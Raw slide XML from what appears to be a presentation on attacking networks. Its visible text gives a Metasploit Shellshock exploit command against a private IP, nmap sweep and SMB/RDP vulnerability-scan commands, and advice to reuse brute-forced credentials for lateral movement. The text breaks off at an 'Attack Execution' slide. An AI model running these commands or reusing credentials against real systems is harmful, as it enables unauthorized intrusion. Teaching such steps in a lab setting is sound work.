          <p:cNvPr id="11" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7415927" y="5980152"/>
            <a:ext cx="5454968" cy="251936"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1950"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1550" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Example: Use Metasploit for Apache vulnerability:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7415927" y="6413421"/>
            <a:ext cx="6650117" cy="1273254"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 718"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7407950" y="6413421"/>
            <a:ext cx="6666071" cy="1273254"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1900"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7569160" y="6534269"/>
            <a:ext cx="6343650" cy="1031558"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EBDFD7"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>msfconsoleuse exploit/unix/webapp/apache_mod_cgi_bash_env_execset RHOST 192.168.0.10exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7415927" y="7868007"/>
            <a:ext cx="6650117" cy="257889"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Uses metasploit to automatically attempt a known exploit on host 192.168.0.10.</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2350532" y="574715"/>
            <a:ext cx="9929336" cy="862846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="6750"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Step 4 – Lateral Movement</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700207" y="1837730"/>
            <a:ext cx="13229987" cy="320159"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2500"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700207" y="2382917"/>
            <a:ext cx="13229987" cy="320159"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2500"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700207" y="3003113"/>
            <a:ext cx="7018973" cy="625197"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="4900"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Scan the Internal Network:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 0" descr="preencoded.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="700207" y="3928348"/>
            <a:ext cx="500182" cy="500182"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700207" y="4678561"/>
            <a:ext cx="2688908" cy="312658"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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Connected Systems</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700207" y="5111234"/>
            <a:ext cx="3119914" cy="1600795"/>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Often times things will be connected, so by gaining access to one thing you can automatically gain access to others </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Image 1" descr="preencoded.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4070152" y="3928348"/>
            <a:ext cx="500182" cy="500182"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4070152" y="4678561"/>
            <a:ext cx="2501027" cy="312658"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4070152" y="5111234"/>
            <a:ext cx="3120033" cy="320159"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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simple nmap commands like </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4070152" y="5656421"/>
            <a:ext cx="3120033" cy="620197"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1474"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4060150" y="5656421"/>
            <a:ext cx="3140035" cy="620197"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4839"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4260175" y="5806440"/>
            <a:ext cx="2739985" cy="320159"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2500"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1550" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EBDFD7"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nmap -sn 192.168.0.0/24</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Image 2" descr="preencoded.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7440216" y="3928348"/>
            <a:ext cx="500182" cy="500182"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7440216" y="4678561"/>
            <a:ext cx="2501027" cy="312658"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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Same credentials</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7440216" y="5111234"/>
            <a:ext cx="3119914" cy="1920954"/>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If brute force succeeded, it is more then likely that the same login information will be used for other things too. You can just try it and see if it works. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Image 3" descr="preencoded.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10810161" y="3928348"/>
            <a:ext cx="500182" cy="500182"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10810161" y="4678561"/>
            <a:ext cx="3120033" cy="625316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1950" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Test for SMB/RDP vulnerabilities:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Shape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10810161" y="5528905"/>
            <a:ext cx="3120033" cy="940356"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 972"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10800159" y="5528905"/>
            <a:ext cx="3140035" cy="940356"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3192"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11000184" y="5678924"/>
            <a:ext cx="2739985" cy="640318"/>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highlight>
                  <a:srgbClr val="EBDFD7"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nmap -p445,3389 192.168.0.20 --script vuln</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10810161" y="6694289"/>
            <a:ext cx="3120033" cy="960477"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2500"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1550" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Similar idea, gaining access to remote computers serves as another vector for attack. </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1888688" y="2908340"/>
            <a:ext cx="10853023" cy="978218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="7700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6150" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Step 5 – Attack Execution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="4340185"/>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4" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="4958239"/>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04825" y="397431"/>
            <a:ext cx="8134350" cy="901541"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="3500"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Every system will be slightly different, so testing is required. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504825" y="1515308"/>
            <a:ext cx="324445" cy="324445"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2818"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F8ECE4"/>
          </a:solidFill>
          <a:ln w="7620">
            <a:solidFill>
              <a:srgbClr val="151617"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="bl" rotWithShape="0" blurRad="0" dist="12700" dir="2700000">
              <a:srgbClr val="151617">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558820" y="1542276"/>
            <a:ext cx="216337" cy="270391"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="973455" y="1564838"/>
            <a:ext cx="1803083" cy="225266"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1750"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Overheat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="973455" y="1952268"/>
            <a:ext cx="7665720" cy="447080"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2045"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="966311" y="1952268"/>
            <a:ext cx="7680008" cy="447080"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4840"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1110496" y="2060377"/>
            <a:ext cx="7391638" cy="230862"/>
          </a:xfrm>
